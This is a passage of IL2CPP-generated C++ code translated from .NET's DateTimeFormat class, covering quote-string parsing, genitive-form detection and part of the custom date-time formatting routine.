String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_3, L_5, /*hidden argument*/NULL); V_2 = L_6; V_3 = (bool)0; goto IL_0069; } IL_001a: { String_t* L_7 = ___format0; int32_t L_8 = ___pos1; int32_t L_9 = L_8; ___pos1 = ((int32_t)il2cpp_codegen_add((int32_t)L_9, (int32_t)1)); Il2CppChar L_10 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_7, L_9, /*hidden argument*/NULL); V_4 = L_10; Il2CppChar L_11 = V_4; Il2CppChar L_12 = V_2; if ((!(((uint32_t)L_11) == ((uint32_t)L_12)))) { goto IL_0031; } } { V_3 = (bool)1; goto IL_006d; } IL_0031: { Il2CppChar L_13 = V_4; if ((!(((uint32_t)L_13) == ((uint32_t)((int32_t)92))))) { goto IL_0060; } } { int32_t L_14 = ___pos1; int32_t L_15 = V_0; if ((((int32_t)L_14) >= ((int32_t)L_15))) { goto IL_0050; } } { StringBuilder_t * L_16 = ___result2; String_t* L_17 = ___format0; int32_t L_18 = ___pos1; int32_t L_19 = L_18; ___pos1 = ((int32_t)il2cpp_codegen_add((int32_t)L_19, (int32_t)1)); Il2CppChar L_20 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_17, L_19, /*hidden argument*/NULL); StringBuilder_Append_m05C12F58ADC2D807613A9301DF438CB3CD09B75A(L_16, L_20, /*hidden argument*/NULL); goto IL_0069; } IL_0050: { String_t* L_21 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralD2F0257C42607F2773F4B8AAB0C017A3B8949322, /*hidden argument*/NULL); FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC * L_22 = (FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC *)il2cpp_codegen_object_new(FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC_il2cpp_TypeInfo_var); FormatException__ctor_m89167FF9884AE20232190FE9286DC50E146A4F14(L_22, L_21, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_22, NULL, DateTimeFormat_ParseQuoteString_m0B491849EDF980D33DC51E7C756D244FF831CA60_RuntimeMethod_var); } IL_0060: { StringBuilder_t * L_23 = ___result2; Il2CppChar L_24 = V_4; StringBuilder_Append_m05C12F58ADC2D807613A9301DF438CB3CD09B75A(L_23, L_24, /*hidden argument*/NULL); } IL_0069: { int32_t L_25 = ___pos1; int32_t L_26 = V_0; if ((((int32_t)L_25) < ((int32_t)L_26))) { goto IL_001a; } } IL_006d: { bool L_27 = V_3; if (L_27) { goto IL_0090; } } { IL2CPP_RUNTIME_CLASS_INIT(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_il2cpp_TypeInfo_var); CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * L_28 = CultureInfo_get_CurrentCulture_mD86F3D8E5D332FB304F80D9B9CA4DE849C2A6831(/*hidden argument*/NULL); String_t* L_29 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralB12EF91185B3724C930E74AF87B78C777D1C701F, /*hidden argument*/NULL); Il2CppChar L_30 = V_2; Il2CppChar L_31 = L_30; RuntimeObject * L_32 = Box(Char_tBF22D9FC341BE970735250BB6FF1A4A92BBA58B9_il2cpp_TypeInfo_var, &L_31); String_t* L_33 = String_Format_m30892041DA5F50D7B8CFD82FFC0F55B5B97A2B7F(L_28, L_29, L_32, /*hidden argument*/NULL); FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC * L_34 = (FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC *)il2cpp_codegen_object_new(FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC_il2cpp_TypeInfo_var); FormatException__ctor_m89167FF9884AE20232190FE9286DC50E146A4F14(L_34, L_33, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_34, NULL, DateTimeFormat_ParseQuoteString_m0B491849EDF980D33DC51E7C756D244FF831CA60_RuntimeMethod_var); } IL_0090: { int32_t L_35 = ___pos1; int32_t L_36 = V_1; return ((int32_t)il2cpp_codegen_subtract((int32_t)L_35, (int32_t)L_36)); } } // System.Int32 System.DateTimeFormat::ParseNextChar(System.String,System.Int32) extern "C" IL2CPP_METHOD_ATTR int32_t DateTimeFormat_ParseNextChar_m7A2B93C769DB2E4AE88704BFB9D06216610F8F98 (String_t* ___format0, int32_t ___pos1, const RuntimeMethod* method) { { int32_t L_0 = ___pos1; String_t* L_1 = ___format0; int32_t L_2 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_1, /*hidden argument*/NULL); if ((((int32_t)L_0) < ((int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_2, (int32_t)1))))) { goto IL_000d; } } { return (-1); } IL_000d: { String_t* L_3 = ___format0; int32_t L_4 = ___pos1; Il2CppChar L_5 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_3, ((int32_t)il2cpp_codegen_add((int32_t)L_4, (int32_t)1)), /*hidden argument*/NULL); return L_5; } } // System.Boolean System.DateTimeFormat::IsUseGenitiveForm(System.String,System.Int32,System.Int32,System.Char) extern "C" IL2CPP_METHOD_ATTR bool DateTimeFormat_IsUseGenitiveForm_mC6899D681D480B53806BD3AF1ED729552991AA66 (String_t* ___format0, int32_t ___index1, int32_t ___tokenLen2, Il2CppChar ___patternToMatch3, const RuntimeMethod* method) { int32_t V_0 = 0; int32_t V_1 = 0; { V_1 = 0; int32_t L_0 = ___index1; V_0 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_0, (int32_t)1)); goto IL_000c; } IL_0008: { int32_t L_1 = V_0; V_0 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_1, (int32_t)1)); } IL_000c: { int32_t L_2 = V_0; if ((((int32_t)L_2) < ((int32_t)0))) { goto IL_001a; } } { String_t* L_3 = ___format0; int32_t L_4 = V_0; Il2CppChar L_5 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_3, L_4, /*hidden argument*/NULL); Il2CppChar L_6 = ___patternToMatch3; if ((!(((uint32_t)L_5) == ((uint32_t)L_6)))) { goto IL_0008; } } IL_001a: { int32_t L_7 = V_0; if ((((int32_t)L_7) < ((int32_t)0))) { goto IL_003c; } } { goto IL_0024; } IL_0020: { int32_t L_8 = V_1; V_1 = ((int32_t)il2cpp_codegen_add((int32_t)L_8, (int32_t)1)); } IL_0024: { int32_t L_9 = V_0; int32_t L_10 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_9, (int32_t)1)); V_0 = L_10; if ((((int32_t)L_10) < ((int32_t)0))) { goto IL_0036; } } { String_t* L_11 = ___format0; int32_t L_12 = V_0; Il2CppChar L_13 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_11, L_12, /*hidden argument*/NULL); Il2CppChar L_14 = ___patternToMatch3; if ((((int32_t)L_13) == ((int32_t)L_14))) { goto IL_0020; } } IL_0036: { int32_t L_15 = V_1; if ((((int32_t)L_15) > ((int32_t)1))) { goto IL_003c; } } { return (bool)1; } IL_003c: { int32_t L_16 = ___index1; int32_t L_17 = ___tokenLen2; V_0 = ((int32_t)il2cpp_codegen_add((int32_t)L_16, (int32_t)L_17)); goto IL_0046; } IL_0042: { int32_t L_18 = V_0; V_0 = ((int32_t)il2cpp_codegen_add((int32_t)L_18, (int32_t)1)); } IL_0046: { int32_t L_19 = V_0; String_t* L_20 = ___format0; int32_t L_21 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_20, /*hidden argument*/NULL); if ((((int32_t)L_19) >= ((int32_t)L_21))) { goto IL_0059; } } { String_t* L_22 = ___format0; int32_t L_23 = V_0; Il2CppChar L_24 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_22, L_23, /*hidden argument*/NULL); Il2CppChar L_25 = ___patternToMatch3; if ((!(((uint32_t)L_24) == ((uint32_t)L_25)))) { goto IL_0042; } } IL_0059: { int32_t L_26 = V_0; String_t* L_27 = ___format0; int32_t L_28 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_27, /*hidden argument*/NULL); if ((((int32_t)L_26) >= ((int32_t)L_28))) { goto IL_0087; } } { V_1 = 0; goto IL_006a; } IL_0066: { int32_t L_29 = V_1; V_1 = ((int32_t)il2cpp_codegen_add((int32_t)L_29, (int32_t)1)); } IL_006a: { int32_t L_30 = V_0; int32_t L_31 = ((int32_t)il2cpp_codegen_add((int32_t)L_30, (int32_t)1)); V_0 = L_31; String_t* L_32 = ___format0; int32_t L_33 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_32, /*hidden argument*/NULL); if ((((int32_t)L_31) >= ((int32_t)L_33))) { goto IL_0081; } } { String_t* L_34 = ___format0; int32_t L_35 = V_0; Il2CppChar L_36 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_34, L_35, /*hidden argument*/NULL); Il2CppChar L_37 = ___patternToMatch3; if ((((int32_t)L_36) == ((int32_t)L_37))) { goto IL_0066; } } IL_0081: { int32_t L_38 = V_1; if ((((int32_t)L_38) > ((int32_t)1))) { goto IL_0087; } } { return (bool)1; } IL_0087: { return (bool)0; } } // System.String System.DateTimeFormat::FormatCustomized(System.DateTime,System.String,System.Globalization.DateTimeFormatInfo,System.TimeSpan) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormat_FormatCustomized_mB01ABBA7E73E58981F9742722B2CD39DDBBCA619 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___dateTime0, String_t* ___format1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___offset3, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeFormat_FormatCustomized_mB01ABBA7E73E58981F9742722B2CD39DDBBCA619_MetadataUsageId); s_Il2CppMethodInitialized = true; } Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * V_0 = NULL; StringBuilder_t * V_1 = NULL; bool V_2 = false; bool V_3 = false; int32_t V_4 = 0; int32_t V_5 = 0; int32_t V_6 = 0; Il2CppChar V_7 = 0x0; int32_t V_8 = 0; int32_t V_9 = 0; int32_t V_10 = 0; StringBuilder_t * V_11 = NULL; int64_t V_12 = 0; int32_t V_13 = 0; int32_t V_14 = 0; int32_t V_15 = 0; int32_t V_16 = 0; String_t* V_17 = NULL; Il2CppChar V_18 = 0x0; StringBuilder_t * G_B60_0 = NULL; StringBuilder_t * G_B59_0 = NULL; String_t* G_B61_0 = NULL; StringBuilder_t * G_B61_1 = NULL; int32_t G_B78_0 = 0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * G_B78_1 = NULL; StringBuilder_t * G_B78_2 = NULL; int32_t G_B77_0 = 0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * G_B77_1 = NULL; StringBuilder_t * G_B77_2 = NULL; int32_t G_B79_0 = 0; int32_t G_B79_1 = 0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * G_B79_2 = NULL; StringBuilder_t * G_B79_3 = NULL; int32_t G_B85_0 = 0; StringBuilder_t * G_B85_1 = NULL; int32_t G_B84_0 = 0; StringBuilder_t * G_B84_1 = NULL; int32_t G_B86_0 = 0; int32_t G_B86_1 = 0; StringBuilder_t * G_B86_2 = NULL; { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_0 = ___dtfi2; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_1 = DateTimeFormatInfo_get_Calendar_mFC8C8E19E118F8EE304B8C359E57EFD25EE2F862(L_0, /*hidden argument*/NULL); V_0 = L_1; StringBuilder_t * L_2 = StringBuilderCache_Acquire_mCA3DDB17F0BFEF32DA9B4D7E8501D5705890557D(((int32_t)16), /*hidden argument*/NULL); V_1 = L_2; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_3 = V_0; int32_t L_4 = VirtFuncInvoker0< int32_t >::Invoke(7 /* System.Int32 System.Globalization.Calendar::get_ID() */, L_3); V_2 = (bool)((((int32_t)L_4) == ((int32_t)8))? 1 : 0); V_3 = (bool)1; V_4 = 0; goto IL_05d3; } IL_0023: { String_t* L_5 = ___format1; int32_t L_6 = V_4; Il2CppChar L_7 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_5, L_6, /*hidden argument*/NULL); V_7 = L_7; Il2CppChar L_8 = V_7; if ((!(((uint32_t)L_8) <= ((uint32_t)((int32_t)75))))) { goto IL_00a1; } } { Il2CppChar L_9 = V_7; if ((!(((uint32_t)L_9) <= ((uint32_t)((int32_t)47))))) { goto IL_006d; } } { Il2CppChar L_10 = V_7; if ((!(((uint32_t)L_10) <= ((uint32_t)((int32_t)37))))) { goto IL_0056; } } { Il2CppChar L_11 = V_7; if ((((int32_t)L_11) == ((int32_t)((int32_t)34)))) { goto IL_052f; } } { Il2CppChar L_12 = V_7; if ((((int32_t)L_12) == ((int32_t)((int32_t)37)))) { goto IL_054d; } } { goto IL_05c0; } IL_0056: { Il2CppChar L_13 = V_7; if ((((int32_t)L_13) == ((int32_t)((int32_t)39)))) { goto IL_052f; } } { Il2CppChar L_14 = V_7; if ((((int32_t)L_14) == ((int32_t)((int32_t)47)))) { goto IL_051a; } } { goto IL_05c0; } IL_006d: { Il2CppChar L_15 = V_7; if ((!(((uint32_t)L_15) <= ((uint32_t)((int32_t)70))))) { goto IL_008a; } } { Il2CppChar L_16 = V_7; if ((((int32_t)L_16) == ((int32_t)((int32_t)58)))) { goto IL_0505; } } { Il2CppChar L_17 = V_7; if ((((int32_t)L_17) == ((int32_t)((int32_t)70)))) { goto IL_01d8; } } { goto IL_05c0; } IL_008a: { Il2CppChar L_18 = V_7; if ((((int32_t)L_18) == ((int32_t)((int32_t)72)))) { goto IL_0178; } } { Il2CppChar L_19 = V_7; if ((((int32_t)L_19) == ((int32_t)((int32_t)75)))) { goto IL_04f5; } } { goto IL_05c0; } IL_00a1: { Il2CppChar L_20 = V_7; if ((!(((uint32_t)L_20) <= ((uint32_t)((int32_t)109))))) { goto IL_00f0; } } { Il2CppChar L_21 = V_7; if ((!(((uint32_t)L_21) <= ((uint32_t)((int32_t)92))))) { goto IL_00c4; } } { Il2CppChar L_22 = V_7; if ((((int32_t)L_22) == ((int32_t)((int32_t)77)))) { goto IL_03bc; } } { Il2CppChar L_23 = V_7; if ((((int32_t)L_23) == ((int32_t)((int32_t)92)))) { goto IL_0592; } } { goto IL_05c0; } IL_00c4: { Il2CppChar L_24 = V_7; switch (((int32_t)il2cpp_codegen_subtract((int32_t)L_24, (int32_t)((int32_t)100)))) { case 0: { goto IL_0368; } case 1: { goto IL_05c0; } case 2: { goto IL_01d8; } case 3: { goto IL_0124; } case 4: { goto IL_0149; } } } { Il2CppChar L_25 = V_7; if ((((int32_t)L_25) == ((int32_t)((int32_t)109)))) { goto IL_0198; } } { goto IL_05c0; } IL_00f0: { Il2CppChar L_26 = V_7; if ((!(((uint32_t)L_26) <= ((uint32_t)((int32_t)116))))) { goto IL_010d; } } { Il2CppChar L_27 = V_7; if ((((int32_t)L_27) == ((int32_t)((int32_t)115)))) { goto IL_01b8; } } { Il2CppChar L_28 = V_7; if ((((int32_t)L_28) == ((int32_t)((int32_t)116)))) { goto IL_02d5; } } { goto IL_05c0; } IL_010d: { Il2CppChar L_29 = V_7; if ((((int32_t)L_29) == ((int32_t)((int32_t)121)))) { goto IL_0451; } } { Il2CppChar L_30 = V_7; if ((((int32_t)L_30) == ((int32_t)((int32_t)122)))) { goto IL_04d8; } } { goto IL_05c0; } IL_0124: { String_t* L_31 = ___format1; int32_t L_32 = V_4; Il2CppChar L_33 = V_7; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); int32_t L_34 = DateTimeFormat_ParseRepeatPattern_m11E6DB962F18F4FA477D4A4E4C168AF8771D67DB(L_31, L_32, L_33, /*hidden argument*/NULL); V_5 = L_34; StringBuilder_t * L_35 = V_1; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_36 = ___dtfi2; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_37 = V_0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_38 = ___dateTime0; int32_t L_39 = VirtFuncInvoker1< int32_t, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 >::Invoke(14 /* System.Int32 System.Globalization.Calendar::GetEra(System.DateTime) */, L_37, L_38); String_t* L_40 = DateTimeFormatInfo_GetEraName_mA4F71726B4A0780F732E56EE4876DCDF7EA2EB38(L_36, L_39, /*hidden argument*/NULL); StringBuilder_Append_mDBB8CCBB7750C67BE2F2D92F47E6C0FA42793260(L_35, L_40, /*hidden argument*/NULL); goto IL_05cc; } IL_0149: { String_t* L_41 = ___format1; int32_t L_42 = V_4; Il2CppChar L_43 = V_7; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); int32_t L_44 = DateTimeFormat_ParseRepeatPattern_m11E6DB962F18F4FA477D4A4E4C168AF8771D67DB(L_41, L_42, L_43, /*hidden argument*/NULL); V_5 = L_44; int32_t L_45 = DateTime_get_Hour_mAE590743ACB6951BD0C4521634B698AE34EC08B3((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___dateTime0), /*hidden argument*/NULL); V_6 = ((int32_t)((int32_t)L_45%(int32_t)((int32_t)12))); int32_t L_46 = V_6; if (L_46) { goto IL_0169; } } { V_6 = ((int32_t)12); } IL_0169: { StringBuilder_t * L_47 = V_1; int32_t L_48 = V_6; int32_t L_49 = V_5; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); DateTimeFormat_FormatDigits_m26B4143174A9FCEFF5DE1BD1DA78EE75F0A12B53(L_47, L_48, L_49, /*hidden argument*/NULL); goto IL_05cc; } IL_0178: { String_t* L_50 = ___format1; int32_t L_51 = V_4; Il2CppChar L_52 = V_7; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); int32_t L_53 = DateTimeFormat_ParseRepeatPattern_m11E6DB962F18F4FA477D4A4E4C168AF8771D67DB(L_50, L_51, L_52, /*hidden argument*/NULL); V_5 = L_53; StringBuilder_t * L_54 = V_1; int32_t L_55 = DateTime_get_Hour_mAE590743ACB6951BD0C4521634B698AE34EC08B3((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___dateTime0), /*hidden argument*/NULL); int32_t L_56 = V_5; DateTimeFormat_FormatDigits_m26B4143174A9FCEFF5DE1BD1DA78EE75F0A12B53(L_54, L_55, L_56, /*hidden argument*/NULL); goto IL_05cc; } IL_0198: { String_t* L_57 = ___format1; int32_t L_58 = V_4; Il2CppChar L_59 = V_7; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); int32_t L_60 = DateTimeFormat_ParseRepeatPattern_m11E6DB962F18F4FA477D4A4E4C168AF8771D67DB(L_57, L_58, L_59, /*hidden argument*/NULL); V_5 = L_60; StringBuilder_t * L_61 = V_1; int32_t L_62 = DateTime_get_Minute_m688A6B7CF6D23E040CBCA15C8CFFBE5EE5C62A77((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___dateTime0), /*hidden argument*/NULL); int32_t L_63 = V_5; DateTimeFormat_FormatDigits_m26B4143174A9FCEFF5DE1BD1DA78EE75F0A12B53(L_61, L_62, L_63, /*hidden argument*/NULL); goto IL_05cc; } IL_01b8: { String_t* L_64 = ___format1; int32_t L_65 = V_4; Il2CppChar L_66 = V_7; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); int32_t L_67 = DateTimeFormat_ParseRepeatPattern_m11E6DB962F18F4FA477D4A4E4C168AF8771D67DB(L_64, L_65, L_66, /*hidden argument*/NULL); V_5 = L_67; StringBuilder_t * L_68 = V_1; int32_t L_69 = DateTime_get_Second_m0EC5A6215E5FF43D49702279430EAD1B66302951((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___dateTime0), /*hidden argument*/NULL); int32_t L_70 = V_5; DateTimeFormat_FormatDigits_m26B4143174A9FCEFF5DE1BD1DA78EE75F0A12B53(L_68, L_69, L_70, /*hidden argument*/NULL); goto IL_05cc; } IL_01d8: { String_t* L_71 = ___format1; int32_t L_72 = V_4; Il2CppChar L_73 = V_7; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); int32_t L_74 = DateTimeFormat_ParseRepeatPattern_m11E6DB962F18F4FA477D4A4E4C168AF8771D67DB(L_71, L_72, L_73, /*hidden argument*/NULL); V_5 = L_74; int32_t L_75 = V_5; if ((((int32_t)L_75) > ((int32_t)7))) { goto IL_02c5; } } { int64_t L_76 = DateTime_get_Ticks_mBCB529E43D065E498EAF08971D2EB49D5CB59D60((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___dateTime0), /*hidden argument*/NULL); V_12 = ((int64_t)((int64_t)L_76%(int64_t)(((int64_t)((int64_t)((int32_t)10000000)))))); int64_t L_77 = V_12; int32_t L_78 = V_5; IL2CPP_RUNTIME_CLASS_INIT(Math_tFB388E53C7FDC6FCCF9A19ABF5A4E521FBD52E19_il2cpp_TypeInfo_var); double L_79 = pow((10.0), (((double)((double)((int32_t)il2cpp_codegen_subtract((int32_t)7, (int32_t)L_78)))))); V_12 = ((int64_t)((int64_t)L_77/(int64_t)(((int64_t)((int64_t)L_79))))); Il2CppChar L_80 = V_7; if ((!(((uint32_t)L_80) == ((uint32_t)((int32_t)102))))) { goto IL_0242; } } { StringBuilder_t * L_81 = V_1; int64_t L_82 = V_12; V_13 = (((int32_t)((int32_t)L_82))); IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* L_83 = ((DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var))->get_fixedNumberFormats_2(); int32_t L_84 = V_5; int32_t L_85 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_84, (int32_t)1)); String_t* L_86 = (L_83)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_85)); IL2CPP_RUNTIME_CLASS_INIT(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_il2cpp_TypeInfo_var); CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * L_87 = CultureInfo_get_InvariantCulture_mF13B47F8A763CE6A9C8A8BB2EED33FF8F7A63A72(/*hidden argument*/NULL); String_t* L_88 = Int32_ToString_mE527694B0C55AE14FDCBE1D9C848446C18E22C09((int32_t*)(&V_13), L_86, L_87, /*hidden argument*/NULL); StringBuilder_Append_mDBB8CCBB7750C67BE2F2D92F47E6C0FA42793260(L_81, L_88, /*hidden argument*/NULL); goto IL_05cc; } IL_0242: { int32_t L_89 = V_5; V_14 = L_89; goto IL_025e; } IL_0248: { int64_t L_90 = V_12; if (((int64_t)((int64_t)L_90%(int64_t)(((int64_t)((int64_t)((int32_t)10))))))) { goto IL_0263; } } { int64_t L_91 = V_12; V_12 = ((int64_t)((int64_t)L_91/(int64_t)(((int64_t)((int64_t)((int32_t)10)))))); int32_t L_92 = V_14; V_14 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_92, (int32_t)1)); } IL_025e: { int32_t L_93 = V_14; if ((((int32_t)L_93) > ((int32_t)0))) { goto IL_0248; } } IL_0263: { int32_t L_94 = V_14; if ((((int32_t)L_94) <= ((int32_t)0))) { goto IL_028f; } } { StringBuilder_t * L_95 = V_1; int64_t L_96 = V_12; V_13 = (((int32_t)((int32_t)L_96))); IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* L_97 = ((DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var))->get_fixedNumberFormats_2(); int32_t L_98 = V_14; int32_t L_99 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_98, (int32_t)1)); String_t* L_100 = (L_97)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_99)); IL2CPP_RUNTIME_CLASS_INIT(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_il2cpp_TypeInfo_var); CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * L_101 = CultureInfo_get_InvariantCulture_mF13B47F8A763CE6A9C8A8BB2EED33FF8F7A63A72(/*hidden argument*/NULL); String_t* L_102 = Int32_ToString_mE527694B0C55AE14FDCBE1D9C848446C18E22C09((int32_t*)(&V_13), L_100, L_101, /*hidden argument*/NULL); StringBuilder_Append_mDBB8CCBB7750C67BE2F2D92F47E6C0FA42793260(L_95, L_102, /*hidden argument*/NULL); goto IL_05cc; } IL_028f: { StringBuilder_t * L_103 = V_1; int32_t L_104 = StringBuilder_get_Length_m44BCD2BF32D45E9376761FF33AA429BFBD902F07(L_103, /*hidden argument*/NULL); if ((((int32_t)L_104) <= ((int32_t)0))) { goto IL_05cc; } } { StringBuilder_t * L_105 = V_1; StringBuilder_t * L_106 = V_1; int32_t L_107 = StringBuilder_get_Length_m44BCD2BF32D45E9376761FF33AA429BFBD902F07(L_106, /*hidden argument*/NULL); Il2CppChar L_108 = StringBuilder_get_Chars_mC069533DCA4FB798DFA069469EBABA85DCC183C6(L_105, ((int32_t)il2cpp_codegen_subtract((int32_t)L_107, (int32_t)1)), /*hidden argument*/NULL); if ((!(((uint32_t)L_108) == ((uint32_t)((int32_t)46))))) { goto IL_05cc; } } { StringBuilder_t * L_109 = V_1; StringBuilder_t * L_110 = V_1; int32_t L_111 = StringBuilder_get_Length_m44BCD2BF32D45E9376761FF33AA429BFBD902F07(L_110, /*hidden argument*/NULL); StringBuilder_Remove_m5DA9C1C4D056FA61B8923BE85E6BFF44B14A24F9(L_109, ((int32_t)il2cpp_codegen_subtract((int32_t)L_111, (int32_t)1)), 1, /*hidden argument*/NULL); goto IL_05cc; } IL_02c5: { String_t* L_112 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralD2F0257C42607F2773F4B8AAB0C017A3B8949322, /*hidden argument*/NULL); FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC * L_113 = (FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC *)il2cpp_codegen_object_new(FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC_il2cpp_TypeInfo_var); FormatException__ctor_m89167FF9884AE20232190FE9286DC50E146A4F14(L_113, L_112, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_113, NULL, DateTimeFormat_FormatCustomized_mB01ABBA7E73E58981F9742722B2CD39DDBBCA619_RuntimeMethod_var); } IL_02d5: { String_t* L_114 = ___format1; int32_t L_115 = V_4; Il2CppChar L_116 = V_7; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); int32_t L_117 = DateTimeFormat_ParseRepeatPattern_m11E6DB962F18F4FA477D4A4E4C168AF8771D67DB(L_114, L_115, L_116, /*hidden argument*/NULL); V_5 = L_117; int32_t L_118 = V_5; if ((!(((uint32_t)L_118) == ((uint32_t)1)))) { goto IL_0343; } } { int32_t L_119 = DateTime_get_Hour_mAE590743ACB6951BD0C4521634B698AE34EC08B3((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___dateTime0), /*hidden argument*/NULL); if ((((int32_t)L_119) >= ((int32_t)((int32_t)12)))) { goto IL_031a; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_120 = ___dtfi2; String_t* L_121 = DateTimeFormatInfo_get_AMDesignator_m3F6101B15CF9711362B92B7827F29BC8589EEC13(L_120, /*hidden argument*/NULL); int32_t L_122 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_121, /*hidden argument*/NULL); if ((((int32_t)L_122) < ((int32_t)1))) { goto IL_05cc; } } { StringBuilder_t * 